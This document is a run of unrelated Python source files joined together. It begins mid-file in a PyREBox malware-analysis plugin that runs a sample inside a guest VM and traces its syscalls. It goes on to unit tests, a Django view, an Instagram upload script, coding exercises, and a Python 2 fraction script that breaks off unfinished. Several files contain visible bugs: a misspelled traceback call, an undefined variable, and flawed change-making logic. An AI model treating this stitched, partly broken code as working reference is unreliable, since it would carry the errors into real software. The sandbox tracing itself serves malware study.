if (addr - process_syms[pos].addr - base) == 0:
return process_syms[pos]
else:
return None
def mdump_syscall_func(dest_pid, dest_pgd, params):
global pyrebox_print
global cm
cpu_index = params['cpu_index']
cpu = params['cpu']
tb = params['tb']
if cpu.EIP != KiFastSystemCall_addr:
pyrebox_print("Error in syscall_func")
return
if TARGET_LONG_SIZE == 4:
if not cpu.EAX in winXP_Exclude_syscalls:
pos = (cpu.EAX & 0xf000) >> 12
num = (cpu.EAX & 0x0fff)
if pos > 1 :
pyrebox_print("Error in syscall index")
return
pyrebox_print("[PID:%x] %s:0x%08x" % (dest_pid, syscalls[pos][num], cpu.EAX))
mdump_print("[PID:%x] %s:0x%08x" % (dest_pid, syscalls[pos][num], cpu.EAX))
# call DAMM to analyze
if MDUMP_DAMM == "True":
mdump_call_damm()
elif TARGET_LONG_SIZE == 8:
pyrebox_print("[PID:%x] KiFastSystemCall RAX:%016x" % (dest_pid, cpu.RAX))
mdump_print("[PID:%x] KiFastSystemCall RAX:%016x" % (dest_pid, cpu.RAX))
if MDUMP_DAMM == "True":
mdump_call_damm()
def mdump_opcodes(dest_pid, dest_pgd, params):
global pyrebox_print
global cm
cpu_index = params['cpu_index']
cpu = params['cpu']
pc = params['cur_pc']
next_pc = params['next_pc']
if not mdump_symbols_loaded:
return
try:
sym = locate_nearest_symbol(next_pc)
if sym is None:
return
mod = sym.mod
func = sym.func
base, size = modules[mod]
real_api_addr = sym.addr + base
if real_api_addr < base and real_api_addr >= base+size:
return
#pyrebox_print("mod:{}, func:{}, addr:{}".format(mod, func, hex(real_api_addr)))
if next_pc != real_api_addr:
return
if TARGET_LONG_SIZE == 4:
pyrebox_print("[PID:%x] pc:%08x-->mod:%s,func:%s(%08x)" % (dest_pid, pc, mod, func, real_api_addr))
mdump_print("[PID:%x] pc:%08x-->mod:%s,func:%s(%08x)" % (dest_pid, pc, mod, func, real_api_addr))
elif TARGET_LONG_SIZE == 8:
pyrebox_print("[PID:%x] pc:%016x-->mod:%s,func:%s(%016x)" % (dest_pid, pc, mod, func, real_api_addr))
mdump_print("[PID:%x] pc:%016x-->mod:%s,func:%s(%016x)" % (dest_pid, pc, mod, func, real_api_addr))
except Exception as e:
pyrebox_print(str(e))
traceback.print_exec()
finally:
return
def mdump_tb_func(dest_pid, dest_pgd, params):
# global tb_num
# if tb_num > MAX_TB_NUM:
# mdump_call_damm()
# tb_num = 1
# else:
# tb_num += 1
global pyrebox_print
global cm
global mdump_tb_time
global MDUMP_FLAG
cpu_index = params['cpu_index']
cpu = params['cpu']
tb = params['tb']
if cpu.EIP != KiFastSystemCall_addr:
pyrebox_print("Error in syscall_func")
return
if TARGET_LONG_SIZE == 4:
if MDUMP_DAMM == "True" and MDUMP_FLAG:
mdump_call_damm()
MDUMP_FLAG = False
if cpu.EAX == 0x11a5:
pos = (cpu.EAX & 0xf000) >> 12
num = (cpu.EAX & 0x0fff)
if pos > 1 :
pyrebox_print("Error in syscall index")
return
pyrebox_print("[PID:%x] %s:0x%08x" % (dest_pid, syscalls[pos][num], cpu.EAX))
mdump_now = time.time()
if mdump_now - mdump_tb_time > mdump_interval:
mdump_tb_time = mdump_now
print(mdump_tb_time)
# call DAMM to analyze
if MDUMP_DAMM == "True":
mdump_call_damm()
def mdump_tb_trace(dest_pid, dest_pgd):
global pyrebox_print
global cm
global modules
global ntdll_syms
global KiFastSystemCall_addr
pyrebox_print("Initializing translation block trace......")
# cm.add_callback(CallbackManager.BLOCK_END_CB, mdump_tb_func, name="mdump_tb")
# cm.add_trigger("mdump_tb", "triggers/trigger_mdump_tb.so")
# cm.set_trigger_var("mdump_tb", "max_mdump_tb_num", MAX_TB_NUM)
base, size = modules[ntdll_name]
if base == 0:
pyrebox_print("Error ntdll base addr")
return
for s in ntdll_syms:
if s.func == KiFastSystemCall_name:
KiFastSystemCall_addr = s.addr+base
pyrebox_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
mdump_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
if KiFastSystemCall_addr == -1:
pyrebox_print("Error, there is no KiFastSystemCall symbol")
return
cm.add_callback(CallbackManager.BLOCK_BEGIN_CB, functools.partial(mdump_tb_func, dest_pid, dest_pgd), name="mdump_tb_trace_{}".format(dest_pid), addr=KiFastSystemCall_addr, pgd=dest_pgd)
def mdump_api_trace(dest_pid, dest_pgd):
global pyrebox_print
global cm
pyrebox_print("Initializing ntdll trace......")
cm.add_callback(CallbackManager.OPCODE_RANGE_CB, functools.partial(mdump_opcodes, dest_pid, dest_pgd), name="mdump_opcode1_%x" % dest_pid, start_opcode=0xFF, end_opcode=0xFF)
cm.add_trigger(("mdump_opcode1_%x" % dest_pid), "triggers/trigger_opcode_user_only.so")
cm.set_trigger_var(("mdump_opcode1_%x" % dest_pid), "cr3", dest_pgd)
def mdump_syscall_trace(dest_pid, dest_pgd):
global pyrebox_print
global cm
global modules
global ntdll_syms
global KiFastSystemCall_addr
pyrebox_print("Initializing syscall trace......")
base, size = modules[ntdll_name]
if base == 0:
pyrebox_print("Error ntdll base addr")
return
for s in ntdll_syms:
if s.func == KiFastSystemCall_name:
KiFastSystemCall_addr = s.addr+base
pyrebox_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
mdump_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
if KiFastSystemCall_addr == -1:
pyrebox_print("Error, there is no KiFastSystemCall symbol")
return
cm.add_callback(CallbackManager.BLOCK_BEGIN_CB, functools.partial(mdump_syscall_func, dest_pid, dest_pgd), name="mdump_syscall_trace_{}".format(dest_pid), addr=KiFastSystemCall_addr, pgd=dest_pgd)
def module_loaded(params):
global ntdll_syms
global process_syms
global modules
global mdump_symbols_loaded
global MDUMP_MODE_TYPE
global cm
pid = params["pid"]
pgd = params["pgd"]
base = params["base"]
size = params["size"]
name = params["name"]
fullname = params["fullname"]
modules[name] = (base, size)
pyrebox_print("Module name:%s" % name)
mdump_print("Module name:%s" % name)
# process mdump at system call
if MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL or MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB:
if mdump_symbols_loaded == False:
#only update symbols for the process
proc_syms = api.get_symbol_list(pgd)
if len(proc_syms) == 0: #can't get syms at the time
return
pyrebox_print("Translate proc_syms({}) to ntdll symbols".format(len(proc_syms)))
for s in proc_syms:
mod = s['mod']
func = s['name']
addr = s['addr']
if mod == ntdll_name:
base, size = modules[mod]
pos = bisect.bisect_left(ntdll_syms, Symbol('', '', addr))
if pos >= 0 and pos < len(ntdll_syms) and ntdll_syms[pos].addr == addr:
continue
bisect.insort(ntdll_syms, Symbol(mod, func, addr))
if len(ntdll_syms):
mdump_symbols_loaded = True
if mdump_symbols_loaded:
try:
import cPickle as pickle
if MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL or MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB:
pyrebox_print("Begin ntdll symbols serialization, len: {}".format(len(ntdll_syms)))
f = open(ntdll_symbols_file, 'wb')
pickle.dump(ntdll_syms, f)
f.close()
pyrebox_print("End ntdll symbols serialization, len: {}".format(len(ntdll_syms)))
except Exception as e:
pyrebox_print("serial error:{}".format(e))
#add syscall trace
ntdll_base, ntdll_size = modules[ntdll_name]
if ntdll_base == 0:
return
if not cm.callback_exists("mdump_syscall_trace_{}".format(pid)) and MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL :
pyrebox_print("Tracing syscalls of pid:{}".format(pid))
mdump_syscall_trace(pid, pgd)
if not cm.callback_exists("mdump_tb_trace_{}".format(pid)) and MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB :
pyrebox_print("Tracing tb syscalls of pid:{}".format(pid))
mdump_tb_trace(pid, pgd)
#process mdump at calling an API
if MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
#only update symbols for the process
proc_syms = api.get_symbol_list(pgd)
if len(proc_syms) == 0: #can't get syms at the time
return
pyrebox_print("Translate process symbols")
modules_in_syms = set(target_procname)
for s in proc_syms:
mod = s['mod']
func = s['name']
addr = s['addr']
base, size = modules[mod]
modules_in_syms.add(mod)
pos = bisect.bisect_left(process_syms, Symbol('', '', addr))
if pos >= 0 and pos < len(process_syms) and process_syms[pos].addr == addr:
continue
bisect.insort(process_syms, Symbol(mod, func, addr))
if(len(modules) == len(modules_in_syms)):
mdump_symbols_loaded = True
if mdump_symbols_loaded:
try:
import cPickle as pickle
if MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
pyrebox_print("Begin process symbols serialization, len: {}".format(len(process_syms)))
f = open(process_symbols_file, 'wb')
pickle.dump(process_syms, f)
f.close()
pyrebox_print("End process symbols serialization, len: {}".format(len(process_syms)))
except Exception as e:
pyrebox_print("serial error:{}".format(e))
def mdump_new_proc(params):
'''
Process creation callback. Receives 3 parameters:
:param pid: The pid of the process(int)
:param pgd: The PGD of the process(int)
:param name: The name of the process(str)
'''
global pyrebox_print
global cm
global ntdll_syms
global process_syms
global mdump_symbols_loaded
global MDUMP_MODE_TYPE
global s_start_time
pid = params["pid"]
pgd = params["pgd"]
name = params["name"]
if name.lower() == target_procname:
#load serial symbols
try:
pyrebox_print("Begin load symbols")
import cPickle as pickle
if MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL:
f = open(ntdll_symbols_file, 'rb')
ntdll_syms = pickle.load(f)
f.close()
pyrebox_print("End load ntdll symbols, len:{}".format(len(ntdll_syms)))
if len(ntdll_syms):
mdump_symbols_loaded = True
elif MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
f = open(process_symbols_file, 'rb')
process_syms = pickle.load(f)
f.close()
pyrebox_print("End load process symbols, len:{}".format(len(process_syms)))
if len(process_syms):
mdump_symbols_loaded = True
else:
pass
except Exception as e:
pyrebox_print("Load syms error:{}".format(e))
#monitor the malware process
pyrebox_print("Malware started! pid: %x, pgd: %x, name: %s" % (pid, pgd, name))
cm.rm_callback("mdump_new_proc")
s_start_time = time.time()
cm.add_callback(CallbackManager.LOADMODULE_CB, module_loaded, pgd = pgd, name = "mdump_module_loaded")
pyrebox_print("Malware started! set the load module monitor")
if MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
mdump_api_trace(pid, pgd)
api.start_monitoring_process(pgd)
pyrebox_print("Malware started! set the process monitor" )
# # process mdump at translation block
# if MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB:
# mdump_tb_trace()
def copy_execute(line):
'''Copy a file from host to guest, execute it, and pause VM on its EP
This file will be set as target, so that the script will start monitoring
context changes and retrieve the module entry point as soon as it is
available in memory. Then it will place a breakpoint on the entry point.
'''
global pyrebox_print
global target_procname
from plugins.guest_agent import guest_agent
pyrebox_print("Copying host file to guest, using agent...")
guest_agent.copy_file(line.strip(), "C:\\"+target_procname)
guest_agent.execute_file("C:\\"+target_procname)
guest_agent.stop_agent()
pyrebox_print("Waiting for process %s to start\n" % target_procname)
def initialize_callbacks(module_hdl, printer):
'''
Initilize callbacks for this module.
This function will be triggered whenever
the script is loaded for the first time,
either with the import_module command,
or when loaded at startup.
'''
global cm
global pyrebox_print
global target_procname
pyrebox_print = printer
pyrebox_print("[*] Removing old mdump result")
mdump_clean(mdump_path)
pyrebox_print("[*] Initializing callbacks")
cm = CallbackManager(module_hdl, new_style = True)
cm.add_callback(CallbackManager.CREATEPROC_CB, mdump_new_proc, name="mdump_new_proc")
pyrebox_print("[*] Initialized callbacks\n")
# check if the target process exists, set calculator.exe as the default target process if it does not exist
from os import listdir
if target_procname not in listdir("malware/"):
target_procname = "calculator.exe"
copy_execute("malware/"+target_procname)
def clean():
global cm
global mdump_buffer
if mdump_buffer:
with open("{0}/{1}_{2}_log.txt".format(mdump_path, target_procname, mdump_mode), 'a') as f:
for log in mdump_buffer:
f.write(log+'\n')
mdump_buffer = []
print("[*] Cleaning module")
cm.clean()
print("[*] Cleaned module")
if __name__ == "__main__":
pass
|
import unittest
from v8_ComMeN.ComMeN.Base.Events.Translocate import *
from v8_ComMeN.ComMeN.Base.Node.Patch import *
from v8_ComMeN.ComMeN.Base.Network.MetapopulationNetwork import *
class TranslocateTestCase(unittest.TestCase):
def setUp(self):
self.probability = 0.1
self.compartment = 'a'
self.internal_compartment = 'b'
self.edge_type = 'edge1'
EDGE_ID = 'edgeid'
self.event_no_internals = Translocate([Patch], self.probability, self.compartment, self.edge_type)
self.event_with_internals = Translocate([Patch], self.probability, self.compartment, self.edge_type,
internal_compartments=[self.internal_compartment])
self.event_not_affected_by_degree = Translocate([Patch], self.probability, self.compartment, self.edge_type,
probability_increases_with_edges=False)
self.nodes = [Patch(0, [self.compartment]), Patch(1, [self.compartment]),
Patch(2, [self.compartment]), Patch(3, [self.compartment])]
self.edges = [(self.nodes[0], self.nodes[1], {EDGE_TYPE: self.edge_type, EDGE_ID:1}),
(self.nodes[0], self.nodes[2], {EDGE_TYPE: self.edge_type, EDGE_ID:2}),
(self.nodes[2], self.nodes[3], {EDGE_TYPE: 'edge2', EDGE_ID:3})]
events = [self.event_no_internals]
self.network = MetapopulationNetwork([self.compartment], self.nodes, self.edges, events)
def test_initialise(self):
self.assertEqual(self.event_no_internals.translocate_compartment, self.compartment)
self.assertEqual(self.event_no_internals.edge_type, self.edge_type)
self.assertFalse(self.event_no_internals.internal_compartments)
self.assertItemsEqual(self.event_with_internals.internal_compartments, [self.internal_compartment])
def test_increment_from_node(self):
# Node 0 - none in compartment
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[0], self.network), 0)
# Node 0 - some in compartment
self.nodes[0].update_subpopulation(self.compartment, 5)
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[0], self.network), 5 * 2)
# Node 1 - none in compartment
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[1], self.network), 0)
# Node 1 - some in compartment
self.nodes[1].update_subpopulation(self.compartment, 7)
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[1], self.network), 7)
# Node 2 - none in compartment
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[2], self.network), 0)
# Node 2 - some in compartment
self.nodes[2].update_subpopulation(self.compartment, 3)
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[2], self.network), 3)
# Node 3 - none in compartment
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[3], self.network), 0)
# Node 3 - some in compartment (no edges though)
self.nodes[3].update_subpopulation(self.compartment, 8)
self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[3], self.network), 0)
# Prob not affected by degree
self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[0],
self.network), 5)
self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[1],
self.network), 7)
self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[2],
self.network), 3)
self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[3],
self.network), 0)
def test_viable_edges(self):
ids = [data['edgeid'] for (neighbour, data) in self.event_no_internals.viable_edges(self.nodes[0], self.network)]
self.assertItemsEqual(ids, [1,2])
ids = [data['edgeid'] for (neighbour, data) in self.event_no_internals.viable_edges(self.nodes[2], self.network)]
self.assertItemsEqual(ids, [2])
def test_choose_neighbour(self):
np.random.seed(101)
edges = self.event_no_internals.viable_edges(self.nodes[0], self.network)
# Need to sort to ensure same result for unit testing - this and numpy random seed should produce edge 2
edges = sorted(edges)
neighbour = self.event_no_internals.choose_neighbour(edges)
self.assertEqual(neighbour, self.nodes[2])
def test_move(self):
self.nodes[0].subpopulations[self.compartment] = 5
self.nodes[0].subpopulations[self.internal_compartment] = 15
self.nodes[1].subpopulations[self.compartment] = 0
self.nodes[1].subpopulations[self.internal_compartment] = 0
self.event_no_internals.move(self.nodes[0], self.nodes[1])
self.assertEqual(self.nodes[0].subpopulations[self.compartment], 4)
self.assertEqual(self.nodes[0].subpopulations[self.internal_compartment], 15)
self.assertEqual(self.nodes[1].subpopulations[self.compartment], 1)
self.assertEqual(self.nodes[1].subpopulations[self.internal_compartment], 0)
self.nodes[0].subpopulations[self.compartment] = 5
self.nodes[0].subpopulations[self.internal_compartment] = 15
self.nodes[1].subpopulations[self.compartment] = 0
self.nodes[1].subpopulations[self.internal_compartment] = 0
self.event_with_internals.move(self.nodes[0], self.nodes[1])
self.assertEqual(self.nodes[0].subpopulations[self.compartment], 4)
self.assertEqual(self.nodes[0].subpopulations[self.internal_compartment], 12)
self.assertEqual(self.nodes[1].subpopulations[self.compartment], 1)
self.assertEqual(self.nodes[1].subpopulations[self.internal_compartment], 3)
def test_update_node(self):
np.random.seed(101)
self.nodes[0].update_subpopulation(self.compartment, 10)
self.event_no_internals.update_node(self.nodes[0], self.network)
self.assertEqual(self.nodes[0].subpopulations[self.compartment], 9)
self.assertEqual(self.nodes[2].subpopulations[self.compartment], 1)
class TranslocateAndChangeTestCase(unittest.TestCase):
def setUp(self):
self.probability = 0.1
self.compartment = 'a'
self.new_compartment = 'z'
self.edge_type = 'edge1'
EDGE_ID = 'edgeid'
self.event = TranslocateAndChange([Patch], self.probability, self.compartment, self.edge_type,
self.new_compartment)
self.nodes = [Patch(0, [self.compartment]), Patch(1, [self.compartment]),
Patch(2, [self.compartment]), Patch(3, [self.compartment])]
self.edges = [(self.nodes[0], self.nodes[1], {EDGE_TYPE: self.edge_type, EDGE_ID: 1}),
(self.nodes[0], self.nodes[2], {EDGE_TYPE: self.edge_type, EDGE_ID: 2}),
(self.nodes[2], self.nodes[3], {EDGE_TYPE: 'edge2', EDGE_ID: 3})]
self.network = MetapopulationNetwork([self.compartment], self.nodes, self.edges, [self.event])
def test_move(self):
self.nodes[0].subpopulations[self.compartment] = 5
self.nodes[0].subpopulations[self.new_compartment] = 0
self.nodes[1].subpopulations[self.compartment] = 0
self.nodes[1].subpopulations[self.new_compartment] = 0
self.event.move(self.nodes[0], self.nodes[1])
self.assertEqual(self.nodes[0].subpopulations[self.compartment], 4)
self.assertEqual(self.nodes[0].subpopulations[self.new_compartment], 0)
self.assertEqual(self.nodes[1].subpopulations[self.compartment], 0)
self.assertEqual(self.nodes[1].subpopulations[self.new_compartment], 1)
if __name__ == '__main__':
unittest.main()
|
import pickle
from rltk.io.serializer import Serializer
class PickleSerializer(Serializer):
"""
`Pickle serializer <https://docs.python.org/3/library/pickle.html>`_ .
"""
def loads(self, string):
return pickle.loads(string)
def dumps(self, obj):
return pickle.dumps(obj)
|
#!/usr/bin/python3
import sys, os
file_list = os.listdir()
input_file = sys.argv[1]
output_file = open("sorted_polymorphic", 'w')
output_file2 = open("sorted_length", 'w')
block = ''
block_list = []
flag = False
with open(input_file, 'r') as f:
for line in f:
if line.startswith("#"):
if block_list:
if flag:
output_file2.writelines(block + "#\n")
block_set = list(set(block_list))
#print (block_list, '###',block_set, '######')
if len(block_set) > 2:
output_file.writelines(block + "#\n")
block = ''
block2 = ''
block_list = []
flag = False
else:
block += line
line_number, sample, node, ssr_type, ssr, length, start, stop, front, back, ssr_verbose, front_r, back_r, ssr_r_verbose = line.split("\t")
block_list.append(length)
if ssr_type != "c":
tmp, total_repeats = ssr.split(")")
if int(total_repeats) >= 8:
flag = True
else:
temper = ssr.split(")")
if int(temper[-1]) >= 8:
flag = True
# header_ids = {'A02_N50':0, 'A12_N50':0, 'A3_N50':0, 'A4_N50':0, 'A6_N50':0, 'A7_N50':0, 'B02_N50':0, 'B03_N50':0, 'B1_N50':0, 'B7_N50':0, 'E9_N50':0, 'G2_N50':0, 'H2_N50':0}
# atlantic = ['A02_N50', 'A12_N50', 'A3_N50', 'A6_N50', 'A7_N50', 'B02_N50', 'B03_N50', 'B1_N50']
# pacific = ['A4_N0', 'B7_N50', 'E9_N50', 'G2_N50', 'H2_N50']
|
#
# Created as part of the StratusLab project (http://stratuslab.eu),
# co-funded by the European Commission under the Grant Agreement
# INFSO-RI-261552."
#
# Copyright (c) 2011, SixSq Sarl
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from stratuslab import Util, Defaults
from stratuslab.Util import printStep, filePutContent, fileGetContent
from stratuslab.installator.Installator import Installator
import stratuslab.system.SystemFactory as SystemFactory
from stratuslab.Exceptions import ValidationException
class Registration(Installator):
def __init__(self, configHolder):
configHolder.assign(self)
self.system = SystemFactory.getSystem(self.frontendSystem, configHolder)
self.packages = ['stratuslab-registration']
def _installFrontend(self):
printStep('Installing packages')
self.system.installPackages(self.packages)
def _setupFrontend(self):
self._validateParameters()
printStep('Creating registration configuration file')
registrationTpl = Util.get_template_file(['registration.cfg.tpl'])
registrationConfFile = os.path.join(Defaults.ETC_DIR, 'registration.cfg')
self._writeConfigFromTemplate(registrationConfFile, registrationTpl)
def _validateParameters(self):
Util.printStep('Validating parameters')
if not self.registrationLdapScheme:
raise ValidationException('registration_ldap_scheme is not defined')
if not self.registrationLdapHost:
raise ValidationException('registration_ldap_host is not defined')
if not self.registrationLdapPort:
raise ValidationException('registration_ldap_port is not defined')
if not self.registrationLdapManagerDn:
raise ValidationException('registration_ldap_manager_dn is not defined')
if not self.registrationLdapManagerPassword:
raise ValidationException('registration_ldap_manager_password is not defined')
if not self.registrationAdminEmail:
raise ValidationException('registration_admin_email is not defined')
if not self.registrationMailHost:
raise ValidationException('registration_mail_host is not defined')
if not self.registrationMailPort:
raise ValidationException('registration_mail_port is not defined')
if not self.registrationMailUser:
raise ValidationException('registration_mail_user is not defined')
if not self.registrationMailPassword:
raise ValidationException('registration_mail_password is not defined')
if not self.registrationMailSsl:
raise ValidationException('registration_mail_ssl is not defined')
if not self.registrationMailDebug:
raise ValidationException('registration_mail_debug is not defined')
if not self.registrationSslTruststore:
self.registrationSslTruststore = ''
def _writeConfigFromTemplate(self, config, tpl):
filePutContent(config,
fileGetContent(tpl) % self.__dict__)
def _startServicesFrontend(self):
self._restartService('registration')
def _restartService(self, service):
Util.printStep("Adding registration service to chkconfig and restarting")
cmd = 'chkconfig --add %s' % service
Util.execute(cmd.split(' '))
cmd = 'service %s restart' % service
Util.execute(cmd.split(' '))
|
#coding:utf8
from django.shortcuts import render, redirect
from page import models
def add_link(request):
if request.method == 'GET':
link = models.Link.objects.all().order_by('count', '-date')[:20]
return render(request, 'add_link.html', {'list': link})
elif request.method == 'POST':
add_link_to = request.POST.get('link')
link = models.Link()
link.link_to = add_link_to
link.count = 0
link.save()
return redirect('/info/'+str(link.pk))
|
from dotenv import load_dotenv
import instabot
import os
import argparse
from instabot import Bot
from os import listdir
load_dotenv()
INSTAGRAM_LOGIN = os.getenv("INSTAGRAM_LOGIN")
INSTAGRAM_PASSWORD= os.getenv("INSTAGRAM_PASSWORD")
def upload_photo_to_instagram(image_name, caption):
bot = Bot()
bot.login(username=INSTAGRAM_LOGIN, password=INSTAGRAM_PASSWORD)
bot.upload_photo(image_name)
def upload_images_to_instagram(directory):
filenames_list = listdir(directory)
for filename in filenames_list:
name = "{0}/{1}".format(directory, filename)
upload_photo_to_instagram(name, caption=None)
def get_parser():
parser = argparse.ArgumentParser(
description='Скрипт предназначен для публикации фотографий в профиле Instagram')
parser.add_argument('directory', help='Директория(папка), из которой будут загружаться фотографии', nargs="?", const=1, default="images")
return parser
if __name__ == "__main__":
args = get_parser().parse_args()
directory = args.directory
upload_images_to_instagram(directory)
|
register={.01: 'PENNY',
.05:'NICKEL',
.10:'DIME',
.25:'QUARTER',
.50:'HALF DOLLAR',
1.00:'ONE',
2.00:'TWO',
5.00:'FIVE',
10.00:'TEN',
20.00:'TWENTY',
50.00:'FIFTY',
100.00:'ONE HUNDRED'}
def calculate(pp,ch):
#left_cash=float("{0:.2f}".format(ch-pp))
left_cash=float(ch)-float(pp)
print(left_cash)
result=[]
while(left_cash>0.01):
if(left_cash>=100.00):
result.append(register[100.00])
left_cash=float("{0:.2f}".format(left_cash-100.00))
print(result)
print(left_cash)
elif(left_cash>=50.00):
result.append(register[50.00])
left_cash=float("{0:.2f}".format(left_cash-50.00))
print(result)
print(left_cash)
elif(left_cash>=20.00):
result.append(register[20.00])
left_cash=float("{0:.2f}".format(left_cash-20.00))
print(result)
print(left_cash)
elif(left_cash>=10.00):
result.append(register[10.00])
left_cash=float("{0:.2f}".format(left_cash-10.00))
print(result)
print(left_cash)
elif(left_cash>=5.00):
result.append(register[5.00])
left_cash=float("{0:.2f}".format(left_cash-5.00))
print(result)
print(left_cash)
elif(left_cash>=2.00):
result.append(register[2.00])
left_cash=float("{0:.2f}".format(left_cash-2.00))
print(result)
print(left_cash)
elif(left_cash>=1.00):
result.append(register[1.00])
left_cash=float("{0:.2f}".format(left_cash-1.00))
print(result)
print(left_cash)
elif(left_cash>=0.50):
result.append(register[0.50])
left_cash=float("{0:.2f}".format(left_cash-0.50))
print(result)
print(left_cash)
elif(left_cash>=0.25):
result.append(register[0.25])
left_cash=float("{0:.2f}".format(left_cash-0.25))
print(result)
print(left_cash)
elif(left_cash>=0.10):
result.append(register[0.10])
left_cash=float("{0:.2f}".format(left_cash-0.10))
print(result)
print(left_cash)
elif(left_cash>=0.5):
result.append(register[0.5])
left_cash=float("{0:.2f}".format(left_cash-0.5))
print(result)
print(left_cash)
elif(left_cash>=0.1):
result.append(register[0.1])
left_cash=float("{0:.2f}".format(left_cash-0.1))
print(result)
print(left_cash)
return(sorted(result))
#import pdb
#pdb.set_trace()
user_input=input()
seperated_input=user_input.split(';')
output=""
pp=seperated_input[0]
ch=seperated_input[1]
if(ch<pp):
print("ERROR")
elif(ch==pp):
print("ZERO")
else:
result=calculate(pp,ch)
for x in result:
output=','.join(x)
print(output)
|
'''
@Author: Sankar
@Date: 2021-04-10 07:38:25
@Last Modified by: Sankar
@Last Modified time: 2021-04-10 07:45:09
@Title : List_Python-13
'''
'''
Write a Python program to append a list to the second list.
'''
list1 = [6, 52, 74, 62]
list2 = [85, 17, 81, 92]
list1.extend(list2) |
from collections import Counter
import os
import itertools
#abspath = os.path.abspath(__file__)
#dname = os.path.dirname(abspath)
#os.chdir(dname)
from own.loading import load_reviews_and_rids
from own.saving import make_dirs
##file_path = os.path.join("..","data", "reviews", "processed_testset.txt")
#review_list, RID_list = load_reviews_and_rids(file_path)
def create_vocab(review_list):
vocab = Counter()
token_lists = []
for review in review_list:
token_lists.append([sentence.split(" ") for sentence in review]) # split sentences into words
token_list = list(itertools.chain.from_iterable(list(itertools.chain.from_iterable(token_lists)))) # extract word in one list
vocab.update(token_list) # update vocabulary
return vocab
def define_min_occurrence(vocab, min_occurrence = 2):
print("Defining min_occurence")
tokens = [k for k,c in vocab.items() if c >= min_occurrence] # Selecting words over min_occurence
print(" Vocab length before truncating: {}\n Vocab length after truncating: {}".format(len(vocab), len(tokens)))
return tokens
def save_vocab(directory, file_name, tokens):
make_dirs(directory)
data = "\n".join(tokens)
file_path = os.path.join(directory, file_name + ".txt")
with open(file_path, "w", encoding = "utf-8") as f:
f.write(data)
print("File {} saved successfully".format(file_name))
def load_vocab(file_path):
with open(file_path, "r", encoding = "utf-8") as f:
return f.read().split("\n") |
# -*- coding: utf-8 -*-
# Rafael Corsi @ insper.edu.br
# Dez/2017
# Disciplina Elementos de Sistemas
#
# script para gerar hack a partir de nasm
# suporta como entrada um único arquivo
# ou um diretório
# Possibilita também a geração do .mif
import os,sys
import argparse
import platform
SIMULATOR = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../..', 'tools','Z01-Simulator-GUI')
if __name__ == "__main__":
root = os.getcwd()
os.chdir(SIMULATOR)
# tenta detectar a versão do python do sistema
# se python2 for a padrão, forca a execucao
# com python 3
os.system('python main.py --rtl_dir=../../G-Computador/Z01-Simulator-RTL/')
|
from django.conf.urls import url, patterns
urlpatterns = patterns('pyconde.sponsorship.views',
url(r'^$',
'list_sponsors',
name='sponsorship_list'),
url(r'^send_job_offer/$',
'job_offer',
name='sponsorship_send_job_offer')
)
|
import xml.etree.ElementTree as ET
def exercise(xml):
"""Iterate over all node elements, check if they are leaf nodes (i.e., have
no node child nodes), and retrieve the creator and title, supplying empty
strings as default values.
"""
ns = {"t": "http://martin.hoppenheit.info/code/generic-tree-xml",
"e": "http://purl.org/dc/elements/1.1/"}
root = ET.fromstring(xml)
results = []
# The iter method does not accept a namespaces mapping parameter.
for n in root.iter("{%s}node" % ns["t"]):
if not n.find("t:node", ns):
creator = n.findtext("t:content/e:creator", "", ns)
title = n.findtext("t:content/e:title", "", ns)
results.append("%s, %s" % (creator, title))
return "\n".join(results)
if __name__ == "__main__":
with open("../xml/example.xml") as f:
xml = f.read()
print(exercise(xml))
|
array=[]
n=int(input('How many elements u want in array: '))
for i in range(n):
f= int(input('Enter no: '))
array.append(f)
print('Entered array: ',array)
if len(array)>=1:
max1=max(array)
min1 = min(array)
diff=max1-min1
print('The difference of largest &smallest value from array: ',diff)
|
#Finds the 4 fractions that can be reduced by cancelling a digit
#in the denominator and the numerator
def forwardArray(a):
#creates an array of the number by inserting each digit
f=[]
a=n
while(a!=0):
f.insert(0,a%10)
a=a/10
return f
def main():
numerator=[]
denominator=[]
i,j,k,l=1,1,1,1
while i in range(1,100):
while j in range(1,100):
while k in range(1,100):
while l in range(1,100):
numerator.append(i)
numerator.append(j)
denominator.append(k)
denominator.append(l)
if numerator[0]==denominator[0]:
if j/l==(numerator[0]*10+numerator[1])/(denominator[0]*10+denominator[1]):
print numerator
print denominator
if numerator[1]==denominator[1]:
